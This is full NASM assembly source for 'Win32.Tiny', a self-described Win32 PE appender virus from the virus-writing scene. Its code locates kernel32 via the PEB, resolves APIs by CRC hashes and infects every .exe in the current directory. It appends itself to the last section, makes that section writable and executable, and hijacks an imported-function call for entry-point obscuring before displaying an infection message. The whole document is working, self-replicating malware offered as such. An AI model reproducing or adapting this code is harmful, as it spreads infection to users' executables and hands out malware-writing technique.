; Win32.Tiny[1175]
;
; My first attempt in Win32 PE virus
;
; :Direct action appender virus
; :CRc's
; :Curent directory
; :No encrypt
; :Epo--E8:xx... jump [ImageBase+ImportAddrassTable RVA]
; :Simple payload
;
; compile with nasm, set writebale flag manualy at 50h
;
; Greets : vx

[BITS 32]
%include "D:\Program Files\nasm\INC\win32n.inc"
virStart:
pushad
call CodeStart
CodeStart:
pop ebp
sub ebp,CodeStart


	mov ebx, [fs:0x30]
	mov ebx, [ebx+0x0c]
	mov ebx, [ebx+0x14]
	mov ebx, [ebx]
	mov ebx, [ebx]
	mov ebx, [ebx+0x10]
	mov [ebp+dwKernelBase], ebx
  

	sub esp, 68
	mov ebx, esp
	lea edi,[ebp+Kernel_APIs]
	mov ecx, 16
	mov edx, [ebp+dwKernelBase]
	push ebp
	mov ebp, ebx
	call RetrieveAPIs
	pop ebp
	lea edx, [ebp+szUser32]
	push edx
	call [ebx+36]
	mov edx, eax
	lea edi, [ebp + User_APIs]
	xor ecx, ecx
	inc ecx
	push ebp
	lea ebp, [ebx+64]
	call RetrieveAPIs
	pop ebp  


infectFirstFile:
	sub esp, 324  
	push esp  
	lea edx, [ebp+szExe]
	push edx  
	call [ebx+16]
	inc eax
	jz endInfection
	dec eax
	mov dword [esp+320], eax
  
infectNextFile:
	call infectFile
	push esp
	push dword [esp+324]
	call [ebx+20]
	test eax,eax
	jnz infectNextFile
  
endInfection:
	add esp, 324
  


	push 0x10
	lea edx,[ebp+szTitle]
	push edx
	lea edx,[ebp+szMsg]
	push edx
	push 0
	call [ebx+64]
	cmp dword [ebp+backToHost+1], 'TINY'
	jne returnToHost
	push 0
	call [ebx+12]

returnToHost:
	add esp, 68
	popad
backToHost:
	push 'TINY'
	retn
  
infectFile:
	sub esp,64
	push ebp
	lea ebp,[esp+4]
	mov edx, dword [ebp+68+WIN32_FIND_DATA.nFileSizeLow]
	mov [ebp+0], edx
	mov [ebp+44], edx
	add dword [ebp+0], virSize+1000h
	lea esi, [ebp+68+WIN32_FIND_DATA.cFileName]
	push esi
	call [ebx+28]
	mov [ebp+4], eax
	push dword 0x80
	push esi  
	call [ebx+48]
	xor edi,edi
	push edi
	push edi
	push 3
	push edi
	push edi
	push 0xc0000000
	push esi
	call [ebx+4]
	inc eax
	jz done
	dec eax
	mov dword [ebp+8], eax
	lea edx, [ebp+12]  
	push edx  
	add edx,8
	push edx  
	add edx,8
	push edx  
	push eax  
	call [ebx+32]
	push edi
	push dword [ebp+0]
	push edi
	push 4
	push edi
	push dword [ebp+8]
	call [ebx+8]
	mov [ebp+36], eax
	push dword [ebp]
	push edi  
	push edi  
	push 2  
	push dword [ebp+36]
	call [ebx+40]
	mov esi,eax
	mov edi,eax
	mov [ebp+40], eax
	cmp word [esi], 'MZ'
	jne UnMap
	cmp byte [esi+50h], 't'
	je UnMap
	mov byte [esi+50h], 't'
	add esi, [esi+0x3c]
	cmp word [esi], 'PE'
	jne UnMap
	mov ecx, esi
	movzx edx, word [esi+6]
	dec edx
	imul edx, 0x28
	add esi, 0xF8
	mov [ebp+60],esi
	add esi, edx
	mov eax,[esi+0xc]
	add eax,[esi+0x8]  
	mov [ebp+48],eax  
	add edi, [esi+14h]  
	add edi, [esi+8]
	or dword [esi+0x24], 00000020h | 20000000h | 80000000h | 80h	;readable,writeable
	add dword [esi+8], virSize
	mov edx, dword [esi+8]
	mov dword [ecx+50h], edx
	mov edx, [esi+0xc]  
	add dword [ecx+50h] , edx
	mov eax, dword [ecx+50h]
	xor edx,edx
	div dword [ecx+38h]
	mov eax, [ecx+38h]
	sub eax,edx
	add dword [ecx+50h], eax
	xor edx,edx  
	mov eax,dword [esi+8]
	div dword [ecx+0x3c]
	mov eax, dword [ecx+0x3c]
	sub eax,edx  
	push ecx  
	mov ecx, dword [esi+8]
	mov dword [esi+10h], ecx
	add dword [esi+10h], eax
	mov ecx, dword [esi+10h]
	mov dword [ebp+44], ecx
	mov ecx, dword [esi+14h]
	add dword [ebp+44], ecx
	pop ecx  
	mov eax,[ecx+34h]
	mov [ebp+52],eax
	mov eax,[ecx+28h]
	mov [ebp+56],eax
	mov esi, virStart  
	add esi, dword [esp]
	mov ecx, virSize  
	cld	
	rep movsb
	call eporoutine  

UnMap:	
	push dword [ebp+44]
	push dword [ebp+40]
	call [ebx+24]
	push dword [ebp+40]
	call [ebx+60]
	push dword [ebp+36]
	call [ebx]  
	lea edx, [ebp+12]
	push edx
	add edx,8
	push edx
	add edx,8
	push edx
	push dword [ebp+8]
	call [ebx+56]
	push 0  
	push 0  
	push dword [ebp+44]
	push dword [ebp+8]
	call [ebx+52]
	push dword [ebp+8]
	call [ebx+44]
	push dword [ebp+8]
	call [ebx]

done:
	push dword [ebp+4]  
	lea edx, [ebp+68+WIN32_FIND_DATA.cFileName]
	push edx
	call [ebx+48]
	pop ebp
	add esp,64
	ret  

eporoutine:
	sub esp,20
	mov esi,[ebp+60] 
	sub esi,0x78
	lodsd 
	push eax
	call RVAtoRAW
	add eax,12 
	mov esi,eax
nextdll:
	mov edx,dword [esi]
	push edx
	call RVAtoRAW
	add esi,20
	cmp dword [eax],'KERN'
	jz dllfound
	cmp dword [eax],'kern'
	jz dllfound
	jmp nextdll

dllfound:
	sub esi,32 
	mov dword [esp+16],esi
	mov edx,dword [esi] 
	push edx
	call RVAtoRAW  
	mov [esp+8],eax
nextRVA:
	mov edx,dword [eax]
	test edx,edx
	jz computend
	add eax,4
	jmp nextRVA

computend:
	sub eax,[esp+8]
	mov edx,[esp+16] 
	add edx,16 
	mov ecx,dword [edx] 
	add ecx,[ebp+52] 
	mov [esp+4],ecx
	add ecx,eax
	mov [esp+12],ecx
  
	mov ecx,[ebp+56] 
	mov edx,[ebp+60] 
	sub ecx,[edx+0xc]
	add ecx,[edx+0x14]
	add ecx,[ebp+40]
	xor eax,eax

findnextcall:
	mov ax,word [ecx]
	cmp ax,0x15ff
	jz Validate_FF15
	cmp al,0xe8
	jz Validate_E8
	inc ecx
	jmp findnextcall

Validate_FF15:
	mov eax,dword [ecx+2]
	cmp eax,dword [esp+4]
	js Fail
	cmp dword [esp+12],eax
	js Fail
	mov esi,eax
	jmp targetfound

Fail:
	inc ecx
	jmp findnextcall

Validate_E8:
	mov eax,[ecx+1]
	add eax,ecx
	add eax,5 
	mov esi,[edx+0x10]
	add esi,[edx+0x14]
	add esi,[ebp+40]
	;now esi point to code section end  
	cmp eax,esi 
	jb possibletarget
	inc ecx
	jmp findnextcall

possibletarget:
	;cmp word [eax],0x25ff
	mov esi,[esp+4] ; esi = ImageBase + ImportAddrassTable RVA
	cmp dword [eax+2],esi 
	js Fault
	mov esi,dword [esp+12]
	cmp esi,dword [eax+2]
	js Fault
	mov esi,dword [eax+2]
	jmp targetfound  
	  ;jz targetfound
Fault:
	inc ecx
	jmp findnextcall
targetfound:  
	sub edi, virSize - (backToHost-virStart)
	mov word [edi],0x25ff
	mov dword [edi+2],esi 
	  
hookthecall:
	mov eax,[ebp+48]
	mov edi,ecx
	sub edi,[ebp+40]
	sub edi,[edx+0x14] 
	; now convert it to memory offset
	add edi,[edx+0xc]
	sub eax,edi
	  
	sub al,5
	cmp byte [ecx],0xE8
	jz Normalcall
	mov byte [ecx],0xE8
	mov byte [ecx+5],0x90
Normalcall:	  
	mov [ecx+1],eax
	add esp,20
	ret
  
RVAtoRAW:
	push esi
	push ecx
	push edx
	mov esi,[ebp+60]
	mov ecx,esi
	sub ecx,0xf2
	movzx edx,word [ecx] 
	mov eax,dword [esp+16]
NextSection:
	add esi,0x28
	dec edx
	test edx,edx
	jz SectionFound
	cmp dword [esi+0xc],eax
	jg SectionFound  
	jmp NextSection
SectionFound:
	sub esi,0x28
	sub eax,[esi+0xc]
	add eax,[esi+0x14]
	mov ecx,[ebp+40]
	add eax,ecx
	pop edx
	pop ecx
	pop esi
	ret 4

RetrieveAPIs:
	push ebx
	push esi
  
	mov esi, edx  
	add esi, [esi+0x3c]
	mov esi, [esi+0x78]
	add esi, edx  
	push esi  
	mov esi, [esi+0x20]
	add esi, edx
	xor ebx, ebx
	cld

looper:
   	inc ebx
   	lodsd  
   	add eax, edx  
   	call GenerateCRC
   	cmp dword [edi], eax
   	jne looper
   	mov eax,[esp]
   	mov eax,[eax+0x24]
   	add eax,edx  
   	movzx eax, word [(ebx-1)*2+eax]
   	push esi  
  	mov esi, [esp+4]
  	mov esi, [esi+0x1c]
   	add esi, edx
   	mov esi,[eax*4+esi]
   	add esi,edx
   	mov [ebp], esi
   	pop esi
   	add edi,4  
   	add ebp,4  
   	dec ecx  
   	jnz looper
 
	pop esi
  
finished:
	pop esi
	pop ebx
	ret  

GenerateCRC:
	 push ebx
	 push ecx
	 or ebx,-1
	 byteByByte:
xor bl,byte [eax]
push 8
pop ecx
bitBybit:
	 shr ebx,1
	 jnc skip
	 xor ebx,0xEDB88320
	 skip:
	 loop bitBybit
inc eax
cmp byte [eax],0
jnz byteByByte
	  mov eax,ebx
	  pop ecx
	  pop ebx
	  ret


  szTitle:  db "Win32.Tiny",0
  szMsg:  db "you just infected",10,"C",10,"Import Table Technology",0
  szUser32:  db "User32.dll",0
  szExe:  db "*.exe",0
  dwKernelBase:  dd 0
  virSize   equ  virEnd - virStart


Kernel_APIs:
  ACloseHandleA:   dd  0x4F6CEA0B
				ACreateFileAA:   dd  0xAAC4A387
				ACreateFileMappingAA:  dd  0x4BE46D93
				AExitProcessA:   dd  0xDAEF6833
				AFindFirstFileAA:  dd  0x36142A31
				AFindNextFileAA:  dd  0x8AD8D6B7
				AFlushViewOfFileA:  dd  0x68865B91
				AGetFileAttributesAA:  dd  0xCF9FE3E3
				AGetFileTimeA:   dd  0xC05002B5
				ALoadLibraryAA:   dd  0xC03E4272
				AMapViewOfFileA:  dd  0x5764C7D0
				ASetEndOfFileA:   dd  0xDAE64EA5
				ASetFileAttributesAA:  dd  0xEA9468FD
				ASetFilePointerA:  dd  0x1038158B
				ASetFileTimeA:   dd  0xDE7FB5FC
				AUnmapViewOfFileA:  dd  0xC6E54950
		User_APIs:
				AMessageBoxAA:   dd  0xA8D2A271
virEnd: